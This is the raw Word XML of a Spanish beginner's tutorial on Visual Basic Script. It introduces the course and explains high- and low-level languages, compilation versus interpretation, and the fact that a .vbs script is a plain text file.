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D2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="666"/>
        <w:ind w:left="1413" w:hanging="1280"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Introducción a la Programación en Visual Basic Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="431" w:line="265"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cs="Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PARTES DEL TUTORIAL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="135"/>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Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="135"/>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Las Variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="135"/>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Control del Flujo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="446" w:line="419" w:lineRule="auto"/>
        <w:ind w:left="157" w:right="135" w:hanging="90"/>
        <w:jc w:val="left"/>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Funciones Gráficas Programación en Visual Basic Script: Funciones Básicas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="295" w:line="265" w:lineRule="auto"/>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Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SOBRE  LOS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  TUTORIALES:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="134"/>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Visual Basic Script es un lenguaje de programación mediante Scripts (no genera .exe al no ser compilado), de alto nivel. En general es uno de los lenguajes más básicos y es, sin duda alguna, la base del Visual Basic 6, ya que todo lo que se aprende aquí, luego puede ser usado en él sin ningún cambio. En otras palabras, es el lenguaje que se suele aprender antes del Visual Basic 6. Es por eso que todo programador de Visual Basic que se precie debe conocerlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="146"/>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Con este motivo, para aquellos que se quieran iniciar en el mundo de la programación con un lenguaje sencillo de aprender, antes de estudiar en la universidad ya otros más avanzados, he decidido poner aquí un tutorial de aprendizaje de Visual Basic Script desde lo más básico hasta lo más avanzado, y posteriormente, como adaptar lo aprendido a Visual Basic 6, y un tutorial sobre él. En definitiva, lo que yo llamo un proceso de aprendizaje desde lo más simple hasta el nivel que te permitirá realizar programas como los que yo ofrezco...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>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b/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introducción en Programación en Visual Basic Script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="8"/>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 xml:space="preserve">Programación con Objetos (ActiveX, “.ocx”) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="245"/>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Uso avanzado y Ejemplos de VBScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="819"/>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 xml:space="preserve">De estos tres simples, pero </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>largos documentos está</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> compuesto el tutorial de Visual Basic Script. Deberás aprender por orden cada uno de ellos para continuar con el siguiente, pero no te apures, no es difícil.</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w:t>
      </w:r>
      <w:r w:rsidR="006C0511" w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">no lo olvides, para dudas o consultas escribe a: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scswinter@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="140" w:line="259"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dudes en visitar: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://scswinter.110mb.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="137"/>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Introducción</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isual Basic Script es un lenguaje de programación de alto nivel no compilado para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Windows. Un entendido podría describirte este lenguaje con esta simple frase, pero ¿Qué significa realmente? Vayamos por pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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isual Basic Script es un lenguaje de programación, esto es, una forma de decirle al Sistema que debe hacer. Si, con los lenguajes de programación los "informáticos" crean sus programas. De hecho, incluso el propio Windows está hecho con uno. Por decirlo de alguna manera, es la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>forma de comunicarnos con el ordenador</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para crear programas.</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otro lado, existen muchísimos lenguajes de programación hoy en día. Si buscáis en Internet os aparecerán más de cien, por eso, necesitan de una clasificación para poder elegir el más apropiado para cada ocasión. Porque </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no todos los lenguajes son iguales y sirven para lo mismo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. De esta forma, inicialmente se hizo una clasificación, que dividía a los lenguajes en dos categorías:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="159" w:hanging="360"/>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De bajo nivel: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Son aquellos que utilizan expresiones y recursos que controlan directamente todo lo que pasa en el ordenad</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>or a nivel lógico. Es decir que,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo, en Ensamblador, para escribir en un archivo, debes enviar una interrupción al procesador y enviarle los datos de acceso a registros del procesador concretos, esperando a la vez una respuesta. Son lenguajes difíciles de aprender, costosos de programar (los pro</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>gramas má</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s sencillos ocupan m</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s de mil líneas...) pero m</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s rápidos y eficaces, pues tienes el control absoluto sobre el programa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="159" w:hanging="360"/>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De alto nivel:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Son aquellos que utilizan expresiones y recursos familiares a la lengua diaria (inglesa, por supuesto). Dan por supuestas muchas cosas para facilitar el trabajo a los programadores y son mucho más fáciles de aprender y programar. Hoy en día, casi todos los lenguajes son de alto nivel, </w:t>
      </w:r>
      <w:r w:rsidR="006C0511" w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ya que,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con ellos, por ejemplo, escribir en un archivo es tan sencillo como indicar el nombre del mismo, y lo que quieres escribir. Existen muchísimos (C, Delphi, Ruby, VB, Pascal...), y entre ellos se encuentra el VBScript.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="16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n esto, queda explicado que significa ser un lenguaje de alto nivel, pero es necesario también conocer que significa que el VBScript no es compilado. Independientemente de que un lenguaje sea de alto o de bajo nivel, pueden estar compilados o no. Esto significa que, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el ordenador no entiende lo que nosotros escribimos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, ya que este se rige por impulsos eléctricos, definidos como bits (0 y 1). Para que el ordenador lo entienda, es necesario que se traduzca el lenguaje a la cadena de 1 y 0 que el es capaz de tratar. Para ello</w:t>
      </w:r>
      <w:r w:rsidR="006C0511" w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utilizan básicamente dos cosas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="159" w:hanging="360"/>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Compilar: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un programa llamado compilador, lee lo que has escrito y lo traduce según las normas del lenguaje usado a algo que el ordenador entien</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de, llamado comúnmente código má</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>quina. Esta "traducción" da como resultado en Windows un archivo acabado en .exe que se puede ejecutar siempre que se quiera.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="159" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Uso de un int</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rprete (no compilar):</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esto consiste en que el código fuente (el código que has escrito), sea leído cada vez que se ejecuta por un programa llamado interprete, que lo va traduciendo al mismo tiempo que se está ejecutando. Estos programas tienen una extensión diferente a la general </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(.rb</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, .js, .vbs, .shs...) pues lo que se ejecuta es el código fuente cada vez.</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Supongo, que con esto queda claro un poco que significan cosas como "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>compilado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>código fuente</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>alto nivel</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>código maquina</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>bajo nivel</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidR="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rprete</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"... Decir también que esto es una vista general, ya que como VBScript no es un lenguaje compilado, ni es de bajo nivel, no se necesitan más explicaciones, aunque debe quedar claro que no todo es tan sencillo como aqui se describe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4"/>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Todas estas características están muy bien, pero no sirven de nada si no se ven en la práctica. Por tanto, comenzaremos viendo que aspecto tiene un programa escrito en VBScript:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3642"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895350" cy="101854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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="895350" cy="1018540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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como veis, un programa en VBScript es un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>archivo de texto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, en cuyo interior escribiremos el código ateniéndonos a las normas del lenguaje, que luego se renombra a "loquequieras.vbs", adoptando este archivo. Cuando lo tenemos con este aspecto, haciendo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
